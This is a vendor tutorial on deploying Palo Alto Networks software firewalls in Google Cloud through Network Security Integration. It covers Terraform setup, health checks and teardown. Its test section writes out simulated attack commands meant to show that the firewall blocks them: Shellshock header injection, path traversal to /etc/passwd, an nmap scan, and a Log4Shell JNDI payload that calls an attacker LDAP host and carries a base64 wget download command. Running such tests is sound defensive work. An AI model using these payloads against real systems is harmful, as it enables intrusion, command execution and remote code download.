This tutorial shows how to deploy Palo Alto Networks Software Firewalls in Google Cloud, utilizing either the in-band or out-of-band deployment model within the Network Security Integration (NSI). NSI provides visibility and security for your VPC network traffic without requiring changes to your underlying network infrastructure.
The functionality of each model is summarized as follows:
| Model | Description |
|---|---|
| Out-of-Band | Uses packet mirroring to forward a copy of network traffic to Software Firewalls for out-of-band inspection. Traffic is mirrored to your software firewalls by creating mirroring rules within your network firewall policy. |
| In-Band | Uses packet intercept to steer network traffic to Software Firewalls for in-line inspection. Traffic is steered to your software firewalls by creating firewall rules within your network firewall policy. |
This tutorial is intended for network administrators, solution architects, and security professionals who are familiar with Compute Engine and Virtual Private Cloud (VPC) networking.
NSI follows a producer-consumer model, where the consumer consumes services provided by the producer. The producer contains the cloud infrastructure responsible for inspecting network traffic, while the consumer environment contains the cloud resources that require inspection.
The producer creates firewalls which serve as the backend service for an internal load balancer. For each zone requiring traffic inspection, the producer creates a forwarding rule, and links it to an intercept or mirroring deployment which is a zone-based resource. These are consolidated into a deployment group, which is then made accessible to the consumer.
| Component | Description |
|---|---|
| Load Balancer | An internal network load balancer that distributes traffic to the NGFWs. |
| Deployments | A zonal resource that acts as a backend of the load balancer, providing network inspection on traffic from the consumer. |
| Deployment Group | A collection of intercept or mirroring deployments that are set up across multiple zones within the same project. It represents the firewalls as a service that consumers reference. |
| Instance Group | A managed or unmanaged instance group that contains the firewalls which enable horizontal scaling. |
Because the internal load balancer does not support zone-based affinity, consider these firewall deployment architectures:
- Zone-Based: Ensures traffic is inspected by a firewall in the same zone as the consumer's source zone.
- Cross-Zone: Allows traffic to be inspected by any firewall within the same region as the traffic's source.
The consumer creates an intercept or mirroring endpoint group corresponding to the producer's deployment group. Then, the consumer associates the endpoint group with VPC networks requiring inspection.
Finally, the consumer creates a network firewall policy with rules that use a security profile group as their action. Traffic matching these rules is intercepted or mirrored to the producer for inspection.
| Component | Description |
|---|---|
| Endpoint Group | A project-level resource that directly corresponds to a producer's deployment group. This group can be associated with multiple VPC networks. |
| Endpoint Group Association | Associates the endpoint group to consumer VPCs. |
| Firewall Rules | Exists within Network Firewall Policies and select traffic to be intercepted or mirrored for inspection by the producer. |
| Security Profiles | Can be type intercept or mirroring and are set as the action within firewall rules. |
The network firewall policy associated with the consumer-vpc contains two rules, each specifying a security profile group as its action. When traffic matches either rule, the traffic is encapsulated to the producer for inspection.
| Network Firewall Policy | ||||
|---|---|---|---|---|
| PRIORITY | DIRECTION | SOURCE | DESTINATION | ACTION |
10 |
Egress |
10.0.0.0/8 |
0.0.0.0/0 |
apply-security-profile |
11 |
Ingress |
0.0.0.0/0 |
10.0.0.0/8 |
apply-security-profile |
Note
In the out-of-band model, traffic is mirrored to the firewalls instead of redirected.traffic would be mirrored to the firewalls instead of redirected.
- The
web-vmmakes a request to the internet. The request is evaluated against the rules within the Network Firewall Policy associated with theconsumer-vpc. - The request matches the
EGRESSrule (priority:10) that specifies a security profile group as its action. - The request is then encapsulated through the
endpoint associationto the producer environment. - Within the producer environment, the
intercept deployment groupdirects traffic to theintercept deploymentlocated in the same zone as theweb-vm. - The internal load balancer forwards the traffic to an available firewall for deep packet inspection.
- If the firewall permits the traffic, it is returned to the
web-vmvia the consumer'sendpoint association. - The local route table of the
consumer-vpcroutes traffic to the internet via the Cloud NAT. - The session is established with the internet destination and is continuously monitored by the firewall.
-
A Google Cloud project.
-
Access to Cloud Shell.
-
The following IAM Roles:
Ability Scope Roles Create firewall endpoints, endpoint associations, security profiles, and network firewall policies. Organization compute.networkAdmincompute.networkUsercompute.networkViewerCreate global network firewall policies and firewall rules for VPC networks. Project compute.securityAdmincompute.networkAdmincompute.networkViewercompute.viewercompute.instanceAdmin
Note
In production environments, it is recommended to deploy the producer resources to a dedicated project. This ensures the security services are managed independently of the consumer.
The Terraform plan in the producer directory creates the producer's VPCs, instance template, instance group, internal load balancer, intercept/mirroring deployment, and intercept/mirroring deployment group.
Note
This Terraform deployment automatically bootstraps the firewalls with a baseline configuration. To bypass bootstrapping and configure the firewalls manually for NSI, see the PAN-OS Configuration Guide.
-
In Cloud Shell, clone the repository, navigate to the
producerdirectory, and create your variables file.git clone https://github.com/PaloAltoNetworks/google-cloud-nsi-tutorial cd google-cloud-nsi-tutorial/producer cp terraform.tfvars.example terraform.tfvars -
Edit
terraform.tfvarsby setting values for the following variables:Key Value Default project_idThe Google Cloud project ID of the producer environment. nullmgmt_allow_ipsA list of IPv4 addresses which have access to the firewall's mgmt interface. ["0.0.0.0/0"]mgmt_public_ipIf true, the management address will have a public IP assigned to it. trueregionThe region to deploy the consumer resources. us-west1image_nameThe firewall image to deploy. vmseries-flex-bundle2-1126mirror_deploymentIf truea mirroring deployment is created instead of an intercept deployment.falseAlways set
mgmt_public_ip = falsein production to prevent exposing the management interface to the public internet.If using a BYOL image (
vmseries-flex-byol-*), add your authcode tobootstrap_files/authcodesbefore deploying. See Bootstrap Methods for details. -
Initialize and apply the terraform plan.
terraform init terraform applyEnter
yesto apply the plan. -
After the apply completes, terraform displays the following message:
Apply complete! Resources: 41 added, 0 changed, 0 destroyed. Outputs: DEPLOYMENT_GROUP = "projects/your-project-id/locations/global/interceptDeploymentGroups/panw-dg"
Important
Record the DEPLOYMENT_GROUP output value.
This is needed later to link your consumer's endpoint group to the producer's deployment group.
-
In Cloud Shell, set environment variables for the NGFW's management IP, region, and zone.
read FW_NAME FW_IP FW_ZONE <<< $(gcloud compute instances list \ --filter='tags.items=(panw-tutorial)' \ --format='value(name, EXTERNAL_IP, zone)') export FW_REGION=$(gcloud compute zones describe $FW_ZONE \ --format='value(region.basename())')
-
SSH into the NGFW.
gcloud compute ssh admin@$FW_NAME --zone=$FW_ZONE
Caution
If your SSH connection fails or prompts for a password, the system is still booting—wait a few minutes and try again.
-
On the NGFW, configure the
adminuser.-
Set a password for
adminuser.configure set mgt-config users admin password -
Commit the changes.
commit -
Type
exittwice to close the SSH session.exit exit
-
-
In Cloud Shell, output the NGFW's management IP, then access the NGFW's interface in a browser.
echo https://$FW_IP
-
In Cloud Shell, verify the health status of the load balancer’s forwarding rules.
gcloud compute backend-services get-health \ $(gcloud compute backend-services list --regions=$FW_REGION --format="value(name)" --limit=1) \ --region=$FW_REGION \ --format="json(status.healthStatus[].forwardingRuleIp,status.healthStatus[].healthState)"(output)
"healthStatus": [ { "forwardingRuleIp": "10.0.1.3", "healthState": "HEALTHY" }, { "forwardingRuleIp": "10.0.1.2", "healthState": "HEALTHY" }, { "forwardingRuleIp": "10.0.1.4", "healthState": "HEALTHY" } ]
Note
This Terraform plan creates a Cross-Zone deployment to inspect traffic across the entire region. Consequently, it provisions a forwarding rule for every zone within that region.
In the consumer directory, use the terraform plan to create the consumer VPC (consumer-vpc), VMs (client-vm & web-vm), and GKE cluster (cluster1). It also creates a Network Firewall Policy to intercept/mirror traffic to an endpoint group.
Note
If you already have an existing consumer environment, go to Connect an Existing Consumer Environment.
-
In Cloud Shell, change to the
consumerdirectory and create your variables file.cd cd google-cloud-nsi-tutorial/consumer cp terraform.tfvars.example terraform.tfvars
-
Edit
terraform.tfvarsby setting values for the following variables:Variable Description Default org_idYour Google Cloud organization ID. nullproject_idThe project ID of the consumer environment. nullproducer_dgThe FQRN of the producer's deployment group (the DEPLOYMENT_GROUPoutput value).nullmgmt_allowed_ipsA list of IPv4 addresses that can access the VMs on TCP:80,22.["0.0.0.0/0"]regionThe region to deploy the consumer resources. us-west1mirror_deploymentIf truea mirroring deployment is created instead of an intercept deployment.false
Note
Set producer_dg to the exact DEPLOYMENT_GROUP value generated by the producer's Terraform output.
-
Initialize and apply the terraform plan.
terraform init terraform apply
Enter
yesto apply the plan. -
After the apply completes, terraform displays the following message:
Apply complete! Resources: 23 added, 0 changed, 0 destroyed. Outputs: CONSUMER_PROJECT = project-id01 CONSUMER_VPC = consumer-vpc REGION = us-west1 ZONE = us-west1-a CLIENT_VM = client-vm CLUSTER = cluster1
Test traffic inspection by generating simulated attacks across your environment to ensure the firewalls successfully detect and prevent threats.
Test both East-West (VM-to-VM) and North-South (VM-to-Internet) inspection flows.
-
In Cloud Shell, use the
client-vmto generate simulated malicious traffic targeting theweb-vm(east/west) and theinternet(north/south).read CLIENT_VM CLIENT_ZONE <<< $(gcloud compute instances list \ --filter="name~'client-vm'" \ --format="value(name, zone)" \ --limit=1) gcloud compute ssh $CLIENT_VM \ --zone=$CLIENT_ZONE \ --tunnel-through-iap \ --command="bash -s" << 'EOF' curl -s -o /dev/null -w "%{http_code}\n" http://www.eicar.org/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh --data "echo Content-Type: text/plain; echo; uname -a" --max-time 2 curl -s -o /dev/null -w "%{http_code}\n" http://www.eicar.org/cgi-bin/user.sh -H "FakeHeader:() { :; }; echo Content-Type: text/html; echo ; /bin/uname -a" --max-time 2 curl -s -o /dev/null -w "%{http_code}\n" http://10.1.0.20/cgi-bin/user.sh -H "FakeHeader:() { :; }; echo Content-Type: text/html; echo ; /bin/uname -a" --max-time 2 curl -s -o /dev/null -w "%{http_code}\n" http://10.1.0.20/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd --max-time 2 nmap -A 10.1.0.20 EOF
(output)
000 000 000 000 000
The
000response codes indicate that the traffic was blocked by the producer. -
On the firewall, go to Monitor → Threat to confirm the firewall prevented the north/south and east/west threats generated by the
client-vm.
Test East-West (Pod-to-Pod) traffic within cluster1.
Note
To inspect pod-to-pod traffic using Network Security Integration (NSI), the cluster must have intranode visibility enabled. This ensures that even traffic between pods residing on the same node is forced out to the network and routed through the firewall.
-
In Cloud Shell, authenticate to the GKE cluster (
cluster1).read CLUSTER_NAME CLUSTER_LOCATION <<< $(gcloud container clusters list \ --filter="resourceLabels.panw=true" \ --format="value(name, location)" \ --limit=1) gcloud container clusters get-credentials $CLUSTER_NAME --location=$CLUSTER_LOCATION -
Deploy a
victimandattackerpod.kubectl apply -f https://raw.githubusercontent.com/PaloAltoNetworks/google-cloud-nsi-tutorial/main/consumer/yaml/demo.yaml -
Extract the IPs of the
victimandattackerpods and save them as environment variables.export VICTIM_IP=$(kubectl get pod victim --template '{{.status.podIP}}') export ATTACK_IP=$(kubectl get pod attacker --template '{{.status.podIP}}') sleep 3 echo "VICTIM IP: $VICTIM_IP" echo "ATTACK IP: $ATTACK_IP"Record the pod IP addresses to reference later.
-
Attempt to exploit the vulnerability on the
victimpod.echo "Sending Log4Shell payload..." kubectl exec -it attacker -- curl -s -o /dev/null -w "HTTP Code: %{http_code}\n" http://$VICTIM_IP/ -H 'X-Api-Version: ${jndi:ldap://attacker-svr:1389/Basic/Command/Base64/d2dldCBodHRwOi8vd2lsZGZpcmUucGFsb2FsdG9uZXR3b3Jrcy5jb20vcHVibGljYXBpL3Rlc3QvZWxmIC1PIC90bXAvbWFsd2FyZS1zYW1wbGUK}' --max-time 2 echo "Sending Directory Traversal payload..." kubectl exec -it attacker -- curl -s -o /dev/null -w "HTTP Code: %{http_code}\n" http://$VICTIM_IP/cgi-bin/../../../../etc/passwd --max-time 2(output)
HTTP Code: 000 command terminated with exit code 2
The
time outresponse indicates the producer blocked the connection. If using mirroring, the traffic will be allowed. -
On the firewall, go to Monitor → Threat to view the threat between the
attackerandvictimpods (both pods fall within the10.20.0.0/16space)
Note
Traffic logs now show the true Pod IP (10.20.0.0/16) instead of the underlying Node IP. This visibility allows you to enforce precise, pod-level security policies and leverage the Kubernetes plugin for automated enforcement.
-
Run
terraform destroyfrom theconsumerdirectory.cd cd google-cloud-nsi-tutorial/consumer terraform destroy -
Enter
yesto delete all consumer resources.
-
Run
terraform destroyfrom the/producerdirectory.cd cd google-cloud-nsi-tutorial/producer terraform destroy -
Enter
yesto delete all producer resources.









